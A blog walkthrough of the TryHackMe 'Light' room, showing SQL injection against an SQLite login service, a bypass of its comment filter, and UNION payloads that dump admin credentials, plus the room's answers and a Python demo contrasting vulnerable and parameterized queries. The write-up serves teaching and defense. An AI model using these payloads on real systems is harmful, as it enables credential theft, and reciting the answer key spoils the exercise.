TryHackMe Light Full Walkthrough & SQL Injection Exploit

Aawart K C

Light
A beginner-friendly challenge focused on SQL Injection in SQLite.


Challenge Setup

Connecting to the machine on port 1337 with nc, we're greeted with a login prompt:

nc 10.10.39.206 1337

Output:

Welcome to the Light database!
Please enter your username:

Testing for SQL Injection

I started with the classic test inputs. A known account logs in normally:

Please enter your username: smokey
Password: vYQ5ngPpw8AdUmL

Then:

Please enter your username: admin
Username not found.

Trying a single quote:

Please enter your username: '
Error: unrecognized token: "''' LIMIT 30"

This error confirms that the SQL query is built by inserting our input directly into the statement, which is what makes SQL injection possible.


Understanding the Query Structure

An input like:

Please enter your username: smokey' '
Error: near "''": syntax error

suggests the query looks something like:

SELECT password FROM users WHERE username = '.....' LIMIT 30;

Next I tested whether a comment could truncate the rest of the query:

Please enter your username: smokey' --

Response:

For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)

So the sequences --, /*, and %0b are filtered. Time to get creative!


Bypassing Filters & Identifying the Database Type

I first assumed MySQL and tried:

' UNION SELECT @@version

But got:

Error: unrecognized token: "@"

I tried PostgreSQL and other DBMS payloads without success. Then I tried SQLite's version function, closing the string with a trailing quote instead of a comment:

Please enter your username: ' Union Select sqlite_version()'
Password: 3.31.1

Boom! Two key takeaways:

  • Backend is SQLite
  • SQLi works even without comments

Extracting Tables & Data

To enumerate tables:

Please enter your username: ' Union Select name FROM sqlite_master'
Password: admintable

Found a table: admintable.

To dump credentials:

Please enter your username: ' Union Select username || '~' || password from admintable'
Password: TryHackMeAdmin~mamZtAuMlrsEy5bp6q17

To retrieve the flag:

Please enter your username: ' Union Select password from admintable'
Password: THM{SQLit3_InJ3cTion_is_SimplE_nO?}

Why Two Different “Password” Outputs?

In this payload:

' Union Select username || '~' || password from admintable'

The || operator concatenates username and password with a ~ separator.

Result: TryHackMeAdmin~mamZtAuMlrsEy5bp6q17

But here:

' Union Select password from admintable'

you're fetching just the password column, which contains the actual flag.
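To make the query inference and the filter bypass concrete, here is an added example (my own code, not the challenge's, whose source is never shown): a constructed in-memory SQLite stand-in whose table layout is assumed from the outputs above, a string-built lookup guarded by the challenge's own blocklist, and the same lookup with a bound parameter. It reproduces the lone-quote error, shows why the blocklist is no defense (the payloads above never need a comment), and shows the parameterized version treating every payload as a plain username.

```python
import sqlite3

# The challenge's blocklist, taken from its error message. Blocking comment
# tokens does not stop injection: the payloads above balance their quotes instead.
BLOCKED = ("/*", "--", "%0b")


def build_db():
    """Constructed in-memory stand-in for the challenge database (layout assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (username TEXT, password TEXT);
        CREATE TABLE admintable (username TEXT, password TEXT);
        INSERT INTO users VALUES ('smokey', 'vYQ5ngPpw8AdUmL');
        INSERT INTO admintable VALUES ('TryHackMeAdmin', 'mamZtAuMlrsEy5bp6q17');
    """)
    return conn


def lookup_vulnerable(conn, username):
    """Builds the query by string interpolation, as the challenge server evidently does."""
    for token in BLOCKED:
        if token in username:
            return "input not allowed"
    query = f"SELECT password FROM users WHERE username = '{username}' LIMIT 30"
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.OperationalError as exc:
        return f"Error: {exc}"  # a lone quote yields: unrecognized token: "''' LIMIT 30"
    return row[0] if row else "Username not found."


def lookup_safe(conn, username):
    """Same lookup with a bound parameter: the input can only ever be a value."""
    query = "SELECT password FROM users WHERE username = ? LIMIT 30"
    row = conn.execute(query, (username,)).fetchone()
    return row[0] if row else "Username not found."


if __name__ == "__main__":
    conn = build_db()
    for payload in ("smokey", "'", "smokey' --", "' Union Select password from admintable'"):
        print(f"{payload!r:45} vulnerable: {lookup_vulnerable(conn, payload)}")
        print(f"{'':45} safe:       {lookup_safe(conn, payload)}")
```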


Challenge Answers

  1. Admin username: TryHackMeAdmin
  2. Password: mamZtAuMlrsEy5bp6q17
  3. Flag: THM{SQLit3_InJ3cTion_is_SimplE_nO?}

  • Title: TryHackMe Light Full Walkthrough & SQL Injection Exploit
  • Author: Aawart K C
  • Created at: 2025-06-26 22:05:59
  • Updated at: 2025-07-11 21:03:24
  • Link: https://blog.aawart.com.np/TryHackMe-light-challenge/
  • License: This work is licensed under CC BY-NC-SA 4.0.